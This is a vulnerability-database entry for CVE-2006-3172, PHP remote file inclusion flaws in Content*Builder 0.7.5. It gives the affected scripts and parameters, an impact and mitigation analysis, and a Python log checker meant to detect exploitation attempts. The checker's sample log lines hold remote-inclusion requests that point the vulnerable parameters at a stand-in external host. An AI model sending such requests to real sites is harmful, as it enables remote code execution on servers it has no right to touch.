CVE-2006-3172 in Content*Builder

Summary

by MITRE

Multiple PHP remote file inclusion vulnerabilities in Content*Builder 0.7.5 allow remote attackers to execute arbitrary PHP code via a URL with a trailing slash (/) character in the (1) lang_path parameter to (a) cms/plugins/col_man/column.inc.php, (b) cms/plugins/poll/poll.inc.php, (c) cms/plugins/user_managment/usrPortrait.inc.php, (d) cms/plugins/user_managment/user.inc.php, (e) cms/plugins/media_manager/media.inc.php, (f) cms/plugins/events/permanent.eventMonth.inc.php, (g) cms/plugins/events/events.inc.php, and (h) cms/plugins/newsletter2/newsletter.inc.php; (2) path[cb] parameter to (i) modules/guestbook/guestbook.inc.php, (j) modules/shoutbox/shoutBox.php, and (k) modules/sitemap/sitemap.inc.php; and the (3) rel parameter to (l) modules/download/overview.inc.php, (m) modules/download/detailView.inc.php, (n) modules/article/fullarticle.inc.php, (o) modules/article/comments.inc.php, (p) modules/article2/overview.inc.php, (q) modules/article2/fullarticle.inc.php, (r) modules/article2/comments.inc.php, (s) modules/headline/headlineBox.php, and (t) modules/headline/showHeadline.inc.php.

Analysis

by VulDB Data Team • 09/12/2025

This vulnerability represents a critical remote file inclusion flaw in Content*Builder version 0.7.5 that allows attackers to execute arbitrary PHP code through manipulated input parameters. The issue stems from inadequate input validation and sanitization mechanisms within multiple plugin and module components of the content management system. The vulnerability manifests when remote attackers manipulate specific parameters in HTTP requests to include external URLs that contain trailing slash characters, enabling the execution of malicious code on the target server. This type of vulnerability falls under the CWE-88 category for Improper Neutralization of Argument Delimiters in a Command, and more specifically aligns with CWE-94 for Code Injection, particularly in the context of remote file inclusion attacks. The ATT&CK framework categorizes this under T1190 for Exploit Public-Facing Application, as it targets web applications accessible over the internet.

The technical implementation of this vulnerability occurs through multiple attack vectors across various plugin modules. The first set of vulnerable parameters includes lang_path in several core modules such as column.inc.php, poll.inc.php, user_management modules, media_manager, events modules, and newsletter modules. These parameters accept URL inputs that, when processed, can be manipulated to include remote PHP files through trailing slash handling. The second vector involves the path[cb] parameter in guestbook, shoutbox, and sitemap modules, while the third vector utilizes the rel parameter in download, article, and headline modules. The trailing slash character manipulation creates a specific parsing condition that bypasses normal input validation, allowing attackers to inject malicious URLs that get included and executed by the PHP interpreter. This vulnerability directly maps to the ATT&CK technique T1059.007 for Command and Scripting Interpreter: PHP, as it enables remote code execution through PHP file inclusion mechanisms.

The operational impact of this vulnerability is severe and encompasses multiple threat scenarios that can compromise entire web applications. Successful exploitation allows attackers to execute arbitrary commands on the target server with the privileges of the web application process, potentially leading to complete system compromise. Attackers can leverage this vulnerability to upload backdoors, establish persistent access, exfiltrate sensitive data, or use the compromised server as a launch point for further attacks within the network infrastructure. The vulnerability affects critical business functionality modules including user management, content management, events, media handling, and newsletter systems, making it particularly dangerous for organizations relying on Content*Builder for their web presence. The widespread nature of affected modules across different functional areas means that a single successful attack can potentially provide access to multiple system components, amplifying the overall impact. Organizations may face regulatory compliance issues, data breaches, and reputational damage if such vulnerabilities are exploited in production environments.

Mitigation strategies for this vulnerability require immediate patching and implementation of comprehensive input validation measures. The most effective immediate solution involves applying the official security patch provided by Content*Builder developers or upgrading to a supported version that addresses this vulnerability. Organizations should implement strict input validation and sanitization procedures, particularly for parameters that accept file paths or URLs, ensuring that all input undergoes proper validation before being processed. Web application firewalls should be configured to detect and block suspicious URL patterns that include trailing slash manipulation or external URL inclusion attempts. Additionally, the principle of least privilege should be enforced by running web applications with minimal required permissions and implementing proper file access controls to prevent unauthorized file inclusion operations. Security monitoring should be enhanced to detect unusual file inclusion patterns or attempts to access external resources through the affected parameters. Regular security assessments and penetration testing should be conducted to identify similar vulnerabilities in other applications and ensure that input validation mechanisms are properly implemented across all web applications. Organizations should also consider implementing automated vulnerability scanning tools that can detect similar remote file inclusion patterns in their codebase and provide early warning of potential security issues.
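
A log check for the monitoring step described above, as an added example that is not part of the original entry or of Content*Builder: it flags requests to the scripts listed in the summary whose lang_path, path[cb] or rel value decodes to a scheme:// URL. The combined-log-format layout, the function name find_rfi_attempts and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter -> affected scripts, copied from the CVE summary on this page.
AFFECTED = {
    "lang_path": """cms/plugins/col_man/column.inc.php cms/plugins/poll/poll.inc.php
        cms/plugins/user_managment/usrPortrait.inc.php cms/plugins/user_managment/user.inc.php
        cms/plugins/media_manager/media.inc.php cms/plugins/events/events.inc.php
        cms/plugins/events/permanent.eventMonth.inc.php
        cms/plugins/newsletter2/newsletter.inc.php""".split(),
    "path[cb]": """modules/guestbook/guestbook.inc.php modules/shoutbox/shoutBox.php
        modules/sitemap/sitemap.inc.php""".split(),
    "rel": """modules/download/overview.inc.php modules/download/detailView.inc.php
        modules/article/fullarticle.inc.php modules/article/comments.inc.php
        modules/article2/overview.inc.php modules/article2/fullarticle.inc.php
        modules/article2/comments.inc.php modules/headline/headlineBox.php
        modules/headline/showHeadline.inc.php""".split(),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # value starts with scheme://

SAMPLE_LOG = [  # constructed lines (documentation IPs, non-resolving host), not real traffic
    '192.0.2.10 - - [12/Sep/2025:10:00:01 +0000] "GET /cb/modules/sitemap/sitemap.inc.php'
    '?path%5Bcb%5D=http%3A%2F%2Fhost.example.invalid%2F HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Sep/2025:10:00:02 +0000] "GET /cb/modules/article/fullarticle.inc.php'
    '?rel=./ HTTP/1.1" 200 2048',
    '192.0.2.12 - - [12/Sep/2025:10:00:03 +0000] "GET /index.php'
    '?rel=http://host.example.invalid/ HTTP/1.1" 200 900',
    '198.51.100.7 - - [12/Sep/2025:10:00:04 +0000] "GET /cms/plugins/poll/poll.inc.php'
    '?lang_path=HTTP://host.example.invalid/ HTTP/1.1" 200 77',
]

def find_rfi_attempts(log_lines):
    """Return (line_no, script, parameter, decoded_value) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        path = unquote(target.path)  # suffix match tolerates installs under a subdirectory
        for param, value in parse_qsl(target.query, keep_blank_values=True):
            script = next((s for s in AFFECTED.get(param, ()) if path.endswith("/" + s)), None)
            if script and REMOTE.match(value):
                hits.append((line_no, script, param, value))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Access logs record only query-string parameters, so values sent in a POST body need the same check applied at the WAF or application layer.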

Reservation

06/22/2006

Moderation

accepted

Entry

18

CPE

ready

EPSS

0.15369

KEV

no

Activities

very low
